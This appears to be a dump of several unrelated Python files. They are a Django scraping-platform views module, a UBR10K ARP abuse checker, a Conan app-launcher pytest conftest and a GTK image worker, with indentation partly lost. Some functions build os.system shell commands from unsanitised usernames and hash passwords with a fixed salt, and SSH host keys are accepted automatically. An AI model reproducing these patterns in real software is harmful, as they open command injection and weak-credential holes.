result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % linkgenaddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % workeraddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def see_log_file(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (linkgenaddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (workeraddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
return HttpResponse(log.text, content_type='text/plain')
@login_required
def gather_status_for_all_projects(request):
projectsdict = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
workers.append(settings.LINK_GENERATOR)
projects = Project.objects.filter(user=request.user)
for project in projects:
projectsdict[project.project_name] = []
project_items = Item.objects.filter(project=project)
for item in project_items:
projectsdict[project.project_name].append(item.item_name)
if request.method == 'POST':
if projectsdict:
allprojectdata = {}
for key in projectsdict:
workerstatus = {}
earliest_start_time = None
earliest_finish_time = None
latest_start_time = None
latest_finish_time = None
uniqueprojectname = request.user.username + '_' + key
for worker in workers:
try:
log = requests.get('%s/logs/%s/%s/stats.log' % (worker, uniqueprojectname, uniqueprojectname), timeout=(3, None))
if log.status_code == 200:
result = json.loads(log.text.replace("'", '"'))  # stats.log holds a Python dict repr; swap quotes to parse it as JSON
if result.get('project_stopped', 0):
workerstatus['finished'] = workerstatus.get('finished', 0) + 1
else:
workerstatus['running'] = workerstatus.get('running', 0) + 1
if result.get('log_count/ERROR', 0):
workerstatus['errors'] = workerstatus.get('errors', 0) + result.get('log_count/ERROR', 0)
for item in projectsdict[key]:
if result.get(item, 0):
workerstatus['item-%s' % item] = workerstatus.get('item-%s' % item, 0) + result.get(item, 0)
if result.get('start_time', False):
start_time = dateutil.parser.parse(result['start_time'])
if earliest_start_time is None:
earliest_start_time = start_time
else:
if start_time < earliest_start_time:
earliest_start_time = start_time
if latest_start_time is None:
latest_start_time = start_time
else:
if start_time > latest_start_time:
latest_start_time = start_time
if result.get('finish_time', False):
finish_time = dateutil.parser.parse(result['finish_time'])
if earliest_finish_time is None:
earliest_finish_time = finish_time
else:
if finish_time < earliest_finish_time:
earliest_finish_time = finish_time
if latest_finish_time is None:
latest_finish_time = finish_time
else:
if finish_time > latest_finish_time:
latest_finish_time = finish_time
elif log.status_code == 404:
workerstatus['hasntlaunched'] = workerstatus.get('hasntlaunched', 0) + 1
else:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
except:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
if earliest_start_time is not None:
workerstatus['earliest_start_time'] = earliest_start_time.strftime("%B %d, %Y %H:%M:%S")
if earliest_finish_time is not None:
workerstatus['earliest_finish_time'] = earliest_finish_time.strftime("%B %d, %Y %H:%M:%S")
if latest_start_time is not None:
workerstatus['latest_start_time'] = latest_start_time.strftime("%B %d, %Y %H:%M:%S")
if latest_finish_time is not None:
workerstatus['latest_finish_time'] = latest_finish_time.strftime("%B %d, %Y %H:%M:%S")
allprojectdata[key] = workerstatus
return JsonResponse(allprojectdata, safe=True)
return HttpResponse('{}')
@login_required
def editsettings(request, settingtype, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
if settingtype == 'linkgenerator':
settingtext = project.settings_link_generator
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if settingtype == 'scraper':
settingtext = project.settings_scraper
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Settings(request.POST)
if form.is_valid():
if settingtype == "linkgenerator":
project.settings_link_generator = form.cleaned_data['settings']
project.save()
if settingtype == "scraper":
project.settings_scraper = form.cleaned_data['settings']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, "editsettings.html",
{'username': request.user.username, 'project': projectname, 'form': form,
'settingtype': settingtype})
@login_required
def start_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.post('%s/schedule.json' % worker, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % worker, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def get_global_system_status(request):
status = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
worker_count = 0
for worker in workers:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(worker).hostname
port = int(urlparse(worker).port)
result = sock.connect_ex((host, port))
if result == 0:
worker_count += 1
except:
pass
finally:
sock.close()
status['scrapers'] = worker_count
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(settings.LINK_GENERATOR).hostname
port = int(urlparse(settings.LINK_GENERATOR).port)
result = sock.connect_ex((host, port))
if result == 0:
status['linkgenerator'] = True
else:
status['linkgenerator'] = False
except:
status['linkgenerator'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
result = sock.connect_ex((settings.RABBITMQ_HOST, settings.RABBITMQ_PORT))
if result == 0:
status['queue'] = True
else:
status['queue'] = False
except:
status['queue'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse("http://" + settings.MONGODB_URI).hostname
port = int(urlparse("http://" + settings.MONGODB_URI).port)
result = sock.connect_ex((host, port))
if result == 0:
status['database'] = True
else:
status['database'] = False
except:
status['database'] = False
finally:
sock.close()
status['databaseaddress'] = settings.MONGODB_PUBLIC_ADDRESS
return JsonResponse(status, safe=False)
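# --- Illustrative helper (a sketch; the view above inlines this) ---
# Each health check above repeats the same connect_ex() probe. The
# pattern, factored out (hypothetical name), is simply:
def _port_open(host, port, timeout=3):
    """Return True when a TCP connection to host:port succeeds."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        return sock.connect_ex((host, int(port))) == 0
    except Exception:
        return False
    finally:
        sock.close()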
@login_required
def share_db(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareDB()
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareDB(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'sharedb.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_db, args=(uniqueprojectname, username.username, projectname, request.user.username), kwargs={})
thr.start()
return render(request, 'sharedb_started.html',
{'username': request.user.username})
else:
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
@login_required
def share_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareProject()
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareProject(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'shareproject.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_project, args=(username.username, projectname, request.user.username), kwargs={})
thr.start()
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
def sharing_db(dbname, target_user, projectname, username):
target_db_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
existing_dbs = connection.database_names()
checked_all_database_names = 0
db_version = 1
while not checked_all_database_names:
checked_all_database_names = 1
for onedbname in existing_dbs:
if str(onedbname) == target_db_name:
target_db_name += str(db_version)
db_version += 1
checked_all_database_names = 0
existing_dbs = connection.database_names()
database = connection[dbname]
if settings.MONGODB_SHARDED:
try:
connection.admin.command('enableSharding', target_db_name)
except:
pass
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
if settings.MONGODB_SHARDED:
try:
connection.admin.command('shardCollection', '%s.%s' % (target_db_name, collection_name),
key={'_id': "hashed"})
except:
pass
col = connection[dbname][collection_name]
insertcol = connection[target_db_name][collection_name]
skip = 0
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip*100)
items = []
for item in collection:
items.append(item)
while len(items) > 0:
skip += 1
insertcol.insert_many(items)
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip * 100)
items = []
for item in collection:
items.append(item)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_db_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_db_name
dataset.save()
connection.close()
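# --- Illustrative helper (a sketch; sharing_db() above inlines this) ---
# sharing_db() pages with find(limit=100, skip=n*100). Streaming the
# cursor and inserting fixed-size batches performs the same copy with a
# single query; 'batch_size' is an illustrative parameter.
def _copy_collection(src_col, dst_col, batch_size=100):
    batch = []
    for doc in src_col.find(projection={'_id': False}):
        batch.append(doc)
        if len(batch) >= batch_size:
            dst_col.insert_many(batch)
            batch = []
    if batch:
        dst_col.insert_many(batch)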
def sharing_project(target_user, projectname, username):
target_project_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
project = Project.objects.get(user=User.objects.get(username=username), project_name=projectname)
newproject = Project(user=targetuser, project_name=target_project_name, link_generator=project.link_generator,
scraper_function=project.scraper_function, settings_scraper=project.settings_scraper,
settings_link_generator=project.settings_link_generator)
newproject.save()
items = Item.objects.filter(project=project)
for item in items:
newitem = Item(item_name=item.item_name, project=newproject)
newitem.save()
fields = Field.objects.filter(item=item)
for field in fields:
newfield = Field(item=newitem, field_name=field.field_name)
newfield.save()
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
newpipeline = Pipeline(project=newproject, pipeline_function=pipeline.pipeline_function,
pipeline_name=pipeline.pipeline_name, pipeline_order=pipeline.pipeline_order)
newpipeline.save()
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_user + '_' + target_project_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_user + '_' + target_project_name
dataset.save()
connection.close()
def mongodb_user_creation(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('createUser', username, pwd=password, roles=[])
connection.close()
def mongodb_user_password_change(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('updateUser', username, pwd=password)
connection.close()
def linux_user_creation(username, password):
encpass = crypt.crypt(password, "2424")
os.system("useradd -p " + encpass + " %s" % username)
os.system("mkdir /home/%s" % username)
os.system("chown %s:%s /home/%s" % (username, username, username))
def linux_user_pass_change(username, password):
encpass = crypt.crypt(password, "2424")
os.system("usermod -p " + encpass + " %s" % username)
@login_required
def database_preview(request, db):
datasets = Dataset.objects.filter(user=request.user)
databases = []
for dataset in datasets:
databases.append(dataset.database)
if db not in databases:
return HttpResponseNotFound('Nothing is here.')
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
database = connection[db]
preview_data = {}
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
col = database[collection_name]
collection = col.find(filter={}, projection={'_id': False}, limit=10, skip=0)
items = []
for item in collection:
items.append(item)
preview_data[collection_name] = json.dumps(items, ensure_ascii=False)
return render(request, template_name="databasepreview.html",
context={'username': request.user.username, 'databases': databases, 'preview_data': preview_data})
|
ubr10k_arp_check.py
|
#!/usr/bin/env python
#+-----------------------------------------------------------------------+
#| File Name: ubr10k_arp_check.py |
#+-----------------------------------------------------------------------+
#| Description: This script checks UBR10K arp tables for abusive devices |
#+-----------------------------------------------------------------------+
#| Usage: pass UBR10K IP addresses to the script for processing |
#+-----------------------------------------------------------------------+
#| Authors: Brian Spaulding |
#+-----------------------------------------------------------------------+
#| Date: 2016-04-15 |
#+-----------------------------------------------------------------------+
#| Version: 1.1.2 |
#+-----------------------------------------------------------------------+
####################################################
# Import necessary modules #
####################################################
import paramiko
import subprocess
import MySQLdb
import sys
import os
import socket
from threading import Thread
from collections import Counter
####################################################
# Enable or disable debugging #
####################################################
DEBUG = False
####################################################
# Pull active alarms from MySQL DB #
####################################################
db = MySQLdb.connect("localhost","REDACTED","REDACTED","zenoss_zep")
cursor = db.cursor()
cursor.execute("SELECT event_key FROM v_event_summary WHERE event_class = '/Cable Plant/IP Abuse' AND status_id in ('0','1')")
rows = cursor.fetchall()
db.close()
alarms = []
for row in rows:
alarms.append(row[0])
if DEBUG:
for alarm in alarms:
print "Mac address %s has an active alarm" % alarm
####################################################
# Confirm that each device is a UBR10K #
####################################################
ubr_ips = []
devnull = open(os.devnull, 'w')
for ip in sys.argv:
try:
check_model = str(subprocess.check_output(['snmpget', '-v2c', '-ccaution', ip, 'sysDescr.0'], stderr=devnull))
if "UBR10K" in check_model:
ubr_ips.append(ip)
else:
raise Exception()
except:
# sys.argv[0] is the script name itself; only warn for genuine arguments
if ip != sys.argv[0]:
print "%s is not a valid UBR10K IP address or hostname" % ip
if DEBUG:
for ip in ubr_ips:
name = str(subprocess.check_output(['snmpget', '-v2c', '-ccaution', ip, 'sysName.0'])).rsplit(None, 1)[-1]
print "Device %s(%s) is ready for processing" % (name, ip)
####################################################
# Build function to gather arp tables #
####################################################
def ipabusealert(ip):
macs = []
name = str(subprocess.check_output(['snmpget', '-v2c', '-ccaution', ip, 'sysName.0'])).rsplit(None, 1)[-1]
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip, username='REDACTED', password='REDACTED', look_for_keys=False, timeout=2)
except:
message = "Unable to SSH into %s to gather arp table" % name
subprocess.call(['zensendevent', '-d', name, '-y', 'ssh_error', '-p', 'SSH Error', '-s', 'Info', '-c', '/Cable Plant/', '-k', 'ssh_error', message])
sys.exit(0)
stdin, stdout, stderr = ssh.exec_command("show arp")
for line in stdout:
if "Bundle" in line and not " 10." in line and not ".1 " in line:
try:
macs.append(line.split()[3].strip())
except IndexError:
pass
ssh.close()
counter_mac = Counter(macs)
for mac in counter_mac:
if counter_mac[mac] >= 10:
message = "Customer mac address %s has %s entries in the arp table" % (mac, counter_mac[mac])
subprocess.call(['zensendevent', '-d', name, '-y', mac, '-p', mac, '-s', 'Warning', '-c', '/Cable Plant/IP Abuse', '-k', mac, message])
elif mac in alarms:
message = "Customer mac address %s has %s entries in the arp table" % (mac, counter_mac[mac])
subprocess.call(['zensendevent', '-d', name, '-y', mac, '-p', mac, '-s', 'Clear', '-c', '/Cable Plant/IP Abuse', '-k', mac, message])
alarms.remove(mac)
for mac in alarms:
if mac not in counter_mac:
message = "Customer mac address %s has 0 entries in the arp table" % mac
subprocess.call(['zensendevent', '-d', name, '-y', mac, '-p', mac, '-s', 'Clear', '-c', '/Cable Plant/IP Abuse', '-k', mac, message])
####################################################
# Call threaded function for each device #
####################################################
threads = []
for ip in ubr_ips:
t = Thread(target=ipabusealert, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join()
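####################################################
# Example invocation (illustrative)                #
####################################################
# Hostnames below are placeholders; each argument is verified as a
# UBR10K via SNMP before ipabusealert() is threaded over it:
# ./ubr10k_arp_check.py 10.10.1.1 10.10.2.1 cmts01.example.net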
|
conftest.py
|
import configparser
import ctypes
import os
import platform
import shutil
import sys
import tempfile
import time
from distutils.util import strtobool
from pathlib import Path
from shutil import copy
from subprocess import CalledProcessError, check_output
from threading import Thread
from unittest import mock
import conan_app_launcher.app.logger as logger
import psutil
import pytest
from conan_app_launcher import SETTINGS_FILE_NAME, base_path, user_save_path
from conan_app_launcher.core import ConanApi, ConanInfoCache, ConanWorker
from conan_app_launcher.settings import *
from conan_app_launcher.ui.common import remove_qt_logger
from conan_app_launcher.ui.main_window import MainWindow
from conans.model.ref import ConanFileReference
from PyQt5 import QtCore, QtWidgets
conan_server_thread = None
# setup conan test server
TEST_REF = "example/9.9.9@local/testing"
TEST_REF_OFFICIAL = "example/1.0.0@_/_"
SKIP_CREATE_CONAN_TEST_DATA = strtobool(os.getenv("SKIP_CREATE_CONAN_TEST_DATA", "False"))
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling)
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps)
def is_ci_job():
if os.getenv("GITHUB_WORKSPACE"):
return True
return False
def get_window_pid(title):
import win32process
import win32gui
hwnd = win32gui.FindWindow(None, title)
_, pid = win32process.GetWindowThreadProcessId(hwnd)
return pid
class PathSetup():
""" Get the important paths form the source repo. """
def __init__(self):
self.test_path = Path(os.path.dirname(__file__))
self.core_path = self.test_path.parent
self.testdata_path = self.test_path / "testdata"
def check_if_process_running(process_name, kill=False):
for process in psutil.process_iter():
try:
if process_name.lower() in process.name().lower():
if kill:
process.kill()
return True
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return False
def create_test_ref(ref, paths, create_params=[""], update=False):
native_ref = ConanFileReference.loads(ref).full_str()
pkgs = ConanApi().search_query_in_remotes(native_ref)
if not update:
for pkg in pkgs:
if pkg.full_str() == native_ref:
return
conanfile = str(paths.testdata_path / "conan" / "conanfile.py")
for param in create_params:
conan_create_and_upload(conanfile, ref, param)
def conan_create_and_upload(conanfile: str, ref: str, create_params=""):
os.system(f"conan create {conanfile} {ref} {create_params}")
os.system(f"conan upload {ref} -r local --force --all")
def run_conan_server():
os.system("conan_server")
def start_conan_server():
# Setup Server config
os.system("conan_server --migrate") # call server once to create a config file
config_path = Path.home() / ".conan_server" / "server.conf"
os.makedirs(str(config_path.parent), exist_ok=True)
# configure the server config file
cp = configparser.ConfigParser()
cp.read(str(config_path))
# add write permissions
if "write_permissions" not in cp:
cp.add_section("write_permissions")
cp["write_permissions"]["*/*@*/*"] = "*"
# if "read_permissions" not in cp:
# cp.add_section("read_permissions")
# cp["read_permissions"]["*/*@*/*"] = "*"
# if "users" not in cp:
# cp.add_section("read_permissions")
# cp["read_permissions"]["*/*@*/*"] = "*"
with config_path.open('w', encoding="utf8") as fd:
cp.write(fd)
# Setup default profile
paths = PathSetup()
profiles_path = paths.testdata_path / "conan" / "profile"
conan = ConanApi()
os.makedirs(conan.client_cache.profiles_path, exist_ok=True)
shutil.copy(str(profiles_path / platform.system().lower()), conan.client_cache.default_profile_path)
# Add to firewall
if platform.system() == "Windows":
# check if firewall was set
try:
check_output("netsh advfirewall firewall show rule conan_server").decode("cp850")
except CalledProcessError:
# allow server port for private connections
args = f'advfirewall firewall add rule name="conan_server" program="{sys.executable}" dir=in action=allow protocol=TCP localport=9300'
ctypes.windll.shell32.ShellExecuteW(None, "runas", "netsh", args, None, 1)
print("Adding firewall rule for conan_server")
# Start Server
global conan_server_thread
if not conan_server_thread:
conan_server_thread = Thread(name="ConanServer", daemon=True, target=run_conan_server)
conan_server_thread.start()
time.sleep(3)
print("ADDING CONAN REMOTE")
os.system("conan remote add local http://127.0.0.1:9300/ false")
os.system("conan user demo -r local -p demo") # todo autogenerate and config
# add the same remote twice to be able to test multiremote views - TODO does not work
# os.system("conan remote add local2 http://127.0.0.1:9300/ false")
# os.system("conan user demo -r local2 -p demo") # todo autogenerate and config
# Create test data
if SKIP_CREATE_CONAN_TEST_DATA:
return
print("CREATING TESTDATA FOR LOCAL CONAN SERVER")
for profile in ["windows", "linux"]:
profile_path = profiles_path / profile
create_test_ref(TEST_REF, paths, [f"-pr {str(profile_path)}",
f"-o shared=False -pr {str(profile_path)}"], update=True)
create_test_ref(TEST_REF_OFFICIAL, paths, [f"-pr {str(profile_path)}"], update=True)
@pytest.fixture(scope="session", autouse=True)
def ConanServer():
started = False
if not check_if_process_running("conan_server"):
started = True
print("STARTING CONAN SERVER")
start_conan_server()
yield
if started:
print("\nKILLING CONAN SERVER\n ")
check_if_process_running("conan_server", kill=True)
@pytest.fixture
def base_fixture(request):
"""
Set up the global variables to be able to start the application.
Needs to be used, if the tested component uses the global Logger.
Clean up all instances after the test.
"""
paths = PathSetup()
os.environ["CONAN_REVISIONS_ENABLED"] = "1"
os.environ["DISABLE_ASYNC_LOADER"] = "True" # for code coverage to work
import conan_app_launcher.app as app
app.active_settings = settings_factory(SETTINGS_INI_TYPE, user_save_path / SETTINGS_FILE_NAME)
app.conan_api = ConanApi()
app.conan_worker = ConanWorker(app.conan_api, app.active_settings)
yield paths
# Teardown
# remove logger, so the logger doesn't log into a nonexistent qt gui
remove_qt_logger(logger.Logger(), MainWindow.qt_logger_name)
# finish worker - otherwise errors and crashes will occur!
if app.conan_worker:
app.conan_worker.finish_working(3)
# delete cache file
if (base_path / ConanInfoCache.CACHE_FILE_NAME).exists():
try:
os.remove(base_path / ConanInfoCache.CACHE_FILE_NAME)
except PermissionError: # just Windows things...
time.sleep(5)
os.remove(base_path / ConanInfoCache.CACHE_FILE_NAME)
# reset singletons
app.conan_worker = None
app.conan_api = None
app.active_settings = None
@pytest.fixture
def light_theme_fixture(base_fixture):
import conan_app_launcher.app as app
app.active_settings.set(GUI_STYLE, GUI_STYLE_LIGHT)
def temp_ui_config(config_file_path: Path):
temp_config_file_path = copy(config_file_path, tempfile.gettempdir())
tmp_file = tempfile.mkstemp()
import conan_app_launcher.app as app
app.active_settings = settings_factory(SETTINGS_INI_TYPE, Path(tmp_file[1]))
app.active_settings.set(LAST_CONFIG_FILE, str(temp_config_file_path))
return Path(temp_config_file_path)
@pytest.fixture
def ui_config_fixture(base_fixture):
""" Use temporary default settings and config file based on testdata/app_config.json """
config_file_path = base_fixture.testdata_path / "app_config.json"
yield temp_ui_config(config_file_path)
@pytest.fixture
def ui_no_refs_config_fixture(base_fixture):
""" Use temporary default settings and config file based on testdata/app_config_empty_refs.json """
config_file_path = base_fixture.testdata_path / "app_config_empty_refs.json"
yield temp_ui_config(config_file_path)
@pytest.fixture
def mock_clipboard(mocker):
from PyQt5.QtWidgets import QApplication
mocker.patch.object(QApplication, 'clipboard')
clipboard = mock.MagicMock()
clipboard.supportsSelection.return_value = True
QApplication.clipboard.return_value = clipboard
return clipboard
|
worker.py
|
import collections
import functools
import threading
import os.path
import tempfile
import shutil
import exifread
from PIL import Image
import gi
gi.require_version('Gdk', '3.0')
gi.require_version('GdkPixbuf', '2.0')
gi.require_version('GLib', '2.0')
from gi.repository import Gdk
from gi.repository import GdkPixbuf
from gi.repository import GLib
PRIORITY_LOW = 200
PRIORITY_MEDIUM = 100
PRIORITY_HIGH = 50
PRIORITY_VERY_HIGH = 0
WorkerTask = collections.namedtuple(
'WorkerTask', ('priority', 'argument')
)
class StopTask(WorkerTask):
def __new__(cls):
return WorkerTask.__new__(cls, PRIORITY_LOW, None)
def process(self, window):
raise StopIteration()
class LoadPixmapTask(WorkerTask):
PRIORITY = PRIORITY_HIGH
def __new__(cls, pic):
return WorkerTask.__new__(cls, cls.PRIORITY, pic)
def notify_window(self, window, item):
window.emit('picture-loaded', item)
return False
def process(self, window):
item = self.argument
print("Worker handling item", item)
if item.pixbuf:
print("Image already loaded")
return
print("Loading image", item)
item.pixbuf = self.load_pixmap(item.file_path)
print("Loaded image", item)
GLib.idle_add(self.notify_window, window, item)
@staticmethod
def load_pixmap(path):
screen_width = Gdk.Screen.width()
screen_height = Gdk.Screen.height()
with open(path, 'rb') as f:
tags = exifread.process_file(f)
orientation = tags.get('Image Orientation')
orientation = orientation.printable if orientation else None
if orientation == 'Horizontal (normal)':
width, height = screen_width, screen_height
rotation = 0
elif orientation == 'Rotated 90 CW':
width, height = screen_height, screen_width
rotation = 270
elif orientation == 'Rotated 90 CCW':
width, height = screen_height, screen_width
rotation = 90
else:
print('Unrecognizable orientation {}'.format(orientation))
width, height = screen_width, screen_height
rotation = 0
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(path, width, height)
if rotation:
pixbuf = pixbuf.rotate_simple(rotation)
return pixbuf
class LoadCurrentPixmapTask(LoadPixmapTask):
PRIORITY = PRIORITY_VERY_HIGH
class CopyPicsTask(WorkerTask):
def __new__(cls, pics):
return WorkerTask.__new__(cls, PRIORITY_MEDIUM, pics)
def process(self, window):
pics = self.argument
target_directory = tempfile.mkdtemp('', 'pictures_copied_')
print('Created target directory', target_directory)
for pic in pics:
in_path = pic.file_path
out_path = shutil.copy2(in_path, target_directory)
print('Copied', in_path, 'to', out_path)
print('Copy finished')
class ScalePicsTask(WorkerTask):
def __new__(cls, pics):
return WorkerTask.__new__(cls, PRIORITY_MEDIUM, pics)
def process(self, window):
pics = self.argument
target_directory = tempfile.mkdtemp('', 'pictures_scaled_')
print('Created target directory', target_directory)
for pic in pics:
in_path = pic.file_path
out_path = os.path.join(
target_directory, 'FULLHD_{}'.format(pic.filename)
)
image = Image.open(in_path)
image.thumbnail((1920, 1080), Image.ANTIALIAS)
image.save(out_path, 'JPEG')
print('Scaled', in_path, 'to', out_path)
print('Scale finished')
def work(task_queue, window):
print("Worker thread started")
while True:
task = task_queue.get()
assert isinstance(task, WorkerTask)
try:
task.process(window)
except StopIteration:
break
finally:
task_queue.task_done()
def create_worker(task_queue, window):
callback = functools.partial(work, task_queue, window)
return threading.Thread(target=callback)
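# --- Illustrative usage sketch (not part of the original module) ---
# WorkerTask is a (priority, argument) tuple, so queue.PriorityQueue
# serves lower numbers first; StopTask (PRIORITY_LOW) sorts after real
# work and ends the thread. None stands in for the GTK window since
# StopTask.process() never touches it.
if __name__ == '__main__':
    import queue
    tasks = queue.PriorityQueue()
    tasks.put(StopTask())
    worker = create_worker(tasks, window=None)
    worker.start()
    worker.join()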
|
pserve.py
|
# (c) 2005 Ian Bicking and contributors; written for Paste
# (http://pythonpaste.org) Licensed under the MIT license:
